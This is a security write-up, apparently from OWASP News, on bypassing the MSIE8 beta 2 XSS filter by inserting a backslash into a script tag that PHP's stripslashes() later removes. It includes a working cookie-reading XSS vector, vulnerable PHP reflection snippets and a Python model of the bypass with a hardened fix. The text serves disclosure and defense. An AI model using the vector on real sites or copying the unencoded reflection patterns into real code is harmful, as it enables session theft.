Bypassing MSIE8 XSS Filter By Design.

When MSIE8 beta 2 launched a few days ago, I took it for a little spin to see whether it lives up to what it claims. I'm actually quite happy and surprised with the XSS filter, but one thing is quite concerning in my opinion. I talked with David Ross from Microsoft about it over the weekend and explained my thoughts on slashes being inserted into vectors to subvert the XSS filter.

Since the XSS filter is signature based, I came up with a simple idea to bypass it in certain situations. I know that many programmers use PHP's stripslashes() function as a kind of automatic reflex on data that comes either from the query string or out of a database. The XSS filter matches its signatures against the query string as the browser sends it, not against what the server eventually echoes back. So if a programmer runs stripslashes() (or a custom-written replace function) over the requested data before reflecting it, a backslash placed inside a tag name breaks the signature in the request while the server silently removes it again in the response: the filter sees sc\ript, the page emits script. Moreover, since many PHP installations still run with magic_quotes_gpc enabled (which prepends a backslash to every quote in GET/POST/cookie data), programmers call stripslashes() to remove the added slashes, so this scenario is not exotic.

This vector gets past the filter unnoticed:

index.php?name="><sc\ript>alert(document.cookie);</script>

Situations where stripslashes() is regularly used on reflected input:

Titles:

<h1><?= stripslashes($_REQUEST['name']);?></h1>

Search:

<h1>You searched for... <?= stripslashes($_REQUEST['name']); ?></h1>

Forms:

<input name="search" value="<?= stripslashes($_REQUEST['name']); ?>" />

etc.
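The mismatch described above can be reproduced offline: the filter inspects the raw query-string value, the server transforms it with stripslashes() and only then reflects it. The following Python is an added example, not code from the original post or from Microsoft; it reimplements PHP's stripslashes() semantics, stands in for the IE8 filter with a constructed, deliberately naive script-tag signature (the real filter's signatures are not on this page and are assumed here), and contrasts the vulnerable <h1> title reflection with a hardened version that HTML-encodes the output after stripping slashes.

```python
import html
import re

# Constructed stand-in for a signature-based reflected-XSS filter.
# Assumption: the filter looks for an opening <script tag in the raw query-string
# value. It is NOT the actual MSIE8 filter rule set, only a model of the idea.
SCRIPT_TAG_SIGNATURE = re.compile(r"<\s*script", re.IGNORECASE)

# The vector from the post (constructed test input, taken from the article).
PAYLOAD = '"><sc\\ript>alert(document.cookie);</script>'


def php_stripslashes(s: str) -> str:
    """Reimplementation of PHP's stripslashes(): drop each backslash and keep the
    character after it; '\\\\' becomes '\\' and '\\0' becomes a NUL byte."""
    out = []
    i, n = 0, len(s)
    while i < n:
        c = s[i]
        if c == "\\" and i + 1 < n:
            nxt = s[i + 1]
            out.append("\0" if nxt == "0" else nxt)
            i += 2
        elif c == "\\":
            i += 1  # a trailing backslash is simply removed
        else:
            out.append(c)
            i += 1
    return "".join(out)


def filter_would_block(raw_query_value: str) -> bool:
    """What the (modelled) browser-side filter decides from the request alone."""
    return SCRIPT_TAG_SIGNATURE.search(raw_query_value) is not None


def render_title(name: str) -> str:
    """The vulnerable pattern from the post: <h1><?= stripslashes($_REQUEST['name']); ?></h1>"""
    return "<h1>" + php_stripslashes(name) + "</h1>"


def render_title_safe(name: str) -> str:
    """Hardened variant: strip slashes if you must, but encode for HTML context
    afterwards (PHP equivalent: htmlspecialchars(stripslashes($x), ENT_QUOTES))."""
    return "<h1>" + html.escape(php_stripslashes(name), quote=True) + "</h1>"


def bypass_demo(raw_query_value: str) -> dict:
    """Compare what the filter sees with what the server actually emits."""
    reflected = render_title(raw_query_value)
    return {
        "filter_blocks_request": filter_would_block(raw_query_value),
        "reflected_html": reflected,
        "script_tag_in_response": SCRIPT_TAG_SIGNATURE.search(reflected) is not None,
    }


if __name__ == "__main__":
    result = bypass_demo(PAYLOAD)
    print("filter blocks request :", result["filter_blocks_request"])
    print("server reflects       :", result["reflected_html"])
    print("<script> in response  :", result["script_tag_in_response"])
    print("hardened output       :", render_title_safe(PAYLOAD))
```

The request-side check never fires because the signature is matched against `sc\ript`, while the response contains a clean `<script>` tag; the hardened renderer makes the transformation irrelevant because the output is encoded for its HTML context regardless of what stripslashes() produced.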

In such cases, the XSS vector passes the XSS filter. Since the XSS filter prevents exploitation of common programming mistakes, it's likely that those same programmers use slash-removal functions as a no-brainer as well. So far, this XSS filter is quite nice and it does its job very well and cleanly. While it's a minor issue, I really want to see protection for it since it's a common occurrence and far from trivial.
source: OWASP News